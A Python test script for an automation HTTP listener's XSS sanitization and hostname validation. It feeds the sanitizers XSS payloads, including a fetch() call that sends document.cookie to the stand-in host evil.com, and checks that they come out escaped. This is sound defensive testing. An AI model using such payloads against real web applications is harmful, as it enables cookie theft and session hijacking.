#!/usr/bin/env python3
"""
Security Test Script for EDH Automation HTTP Listener
Tests XSS vulnerability mitigations
"""

import html
import sys
import os

# Add the current directory to the Python path to import our module
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))

# Import our sanitization functions
from edh_automation_http_listener import _deep_html_escape_json_data, _sanitize_external_api_data

def test_deep_html_escape():
    """Test the deep HTML escape function"""
    print("Testing _deep_html_escape_json_data function...")
    
    # Test cases with potential XSS payloads
    test_cases = [
        # Simple string XSS
        "<script>alert('xss')</script>",
        
        # Object with XSS
        {
            "dagName": "<img src=x onerror=alert('xss')>",
            "environmentName": "<script>document.location='http://evil.com'</script>"
        },
        
        # Array with XSS
        ["<svg onload=alert('xss')>", "normal_value"],
        
        # Nested structure with XSS
        {
            "request_data": {
                "dagName": "<iframe src=javascript:alert('xss')></iframe>",
                "nested": ["<object data='data:text/html,<script>alert(1)</script>'></object>"]
            }
        }
    ]
    
    for i, test_case in enumerate(test_cases):
        print(f"\nTest case {i+1}:")
        print(f"Input: {test_case}")
        sanitized = _deep_html_escape_json_data(test_case)
        print(f"Sanitized: {sanitized}")
        
        # Verify that dangerous characters are escaped
        sanitized_str = str(sanitized)
        assert '<script>' not in sanitized_str, "Script tags should be escaped"
        assert '<img' not in sanitized_str or '&lt;img' in sanitized_str, "Image tags should be escaped"
        assert 'javascript:' not in sanitized_str, "JavaScript URLs should be escaped"
        print("✓ PASS: Dangerous content properly escaped")

def test_external_api_sanitization():
    """Test the external API data sanitization function"""
    print("\n\nTesting _sanitize_external_api_data function...")
    
    # Test cases simulating malicious content that might come from external APIs
    test_cases = [
        # Malicious DAG run ID
        "dag_run_<script>alert('stored_xss')</script>_123",
        
        # Malicious error response
        "Error: <img src=x onerror=fetch('http://evil.com/steal?cookie='+document.cookie)>",
        
        # Various data types
        123,
        True,
        None,
        {"error": "<svg/onload=alert('xss')>"},
        ["<object data='javascript:alert(1)'></object>", "normal_item"]
    ]
    
    for i, test_case in enumerate(test_cases):
        print(f"\nTest case {i+1}:")
        print(f"Input: {test_case} (type: {type(test_case)})")
        sanitized = _sanitize_external_api_data(test_case)
        print(f"Sanitized: {sanitized}")
        
        # Verify that dangerous characters are escaped
        sanitized_str = str(sanitized)
        assert '<script>' not in sanitized_str, "Script tags should be escaped"
        assert 'javascript:' not in sanitized_str, "JavaScript URLs should be escaped"
        assert 'onerror=' not in sanitized_str, "Event handlers should be escaped"
        print("✓ PASS: External API data properly sanitized")

def test_combined_sanitization():
    """Test that both sanitization methods work together"""
    print("\n\nTesting combined sanitization approach...")
    
    # Simulate a response that might be generated by the application
    mock_response = {
        "status": "Success",
        "dag_name": "<script>alert('user_input_xss')</script>",
        "dag_run_id": "run_<img src=x onerror=alert('stored_xss')>_123",
        "message": "DAG triggered successfully"
    }
    
    print(f"Mock response before sanitization: {mock_response}")
    
    # Apply both sanitization methods
    # First sanitize any external API data
    mock_response["dag_run_id"] = _sanitize_external_api_data(mock_response["dag_run_id"])
    
    # Then apply deep sanitization to the entire response
    final_response = _deep_html_escape_json_data(mock_response)
    
    print(f"Final response after sanitization: {final_response}")
    
    # Verify complete sanitization
    response_str = str(final_response)
    assert '<script>' not in response_str, "Script tags should be escaped"
    assert '<img' not in response_str or '&lt;img' in response_str, "Image tags should be escaped"
    assert 'onerror=' not in response_str, "Event handlers should be escaped"
    print("✓ PASS: Combined sanitization successful")

def test_hostname_validation():
    """Test hostname validation regex"""
    print("\n\nTesting hostname validation...")
    
    import re
    
    # Valid hostnames
    valid_hostnames = [
        "example.com",
        "subdomain.example.com",
        "test-env.aws.amazon.com",
        "localhost",
        "127.0.0.1",
        "airflow-instance-123.us-west-2.amazonaws.com"
    ]
    
    # Invalid/malicious hostnames
    invalid_hostnames = [
        "evil.com/malicious/path",
        "example.com:8080/path",
        "javascript:alert('xss')",
        "<script>alert('xss')</script>",
        "evil.com#fragment",
        "evil.com?param=value"
    ]
    
    hostname_pattern = r'^[a-zA-Z0-9.-]+$'
    
    print("Testing valid hostnames:")
    for hostname in valid_hostnames:
        is_valid = bool(re.match(hostname_pattern, hostname))
        print(f"  {hostname}: {'✓ VALID' if is_valid else '✗ INVALID'}")
        assert is_valid, f"Valid hostname {hostname} should pass validation"
    
    print("\nTesting invalid hostnames:")
    for hostname in invalid_hostnames:
        is_valid = bool(re.match(hostname_pattern, hostname))
        print(f"  {hostname}: {'✗ INVALID' if not is_valid else '✓ VALID'}")
        assert not is_valid, f"Invalid hostname {hostname} should fail validation"
    
    print("✓ PASS: Hostname validation working correctly")

if __name__ == "__main__":
    print("=== EDH Automation HTTP Listener Security Tests ===")
    print("Testing XSS vulnerability mitigations...\n")
    
    try:
        test_deep_html_escape()
        test_external_api_sanitization()
        test_combined_sanitization()
        test_hostname_validation()
        
        print("\n" + "="*50)
        print("🎉 ALL SECURITY TESTS PASSED!")
        print("XSS vulnerabilities have been successfully mitigated.")
        print("="*50)
        
    except Exception as e:
        print(f"\n❌ TEST FAILED: {e}")
        sys.exit(1)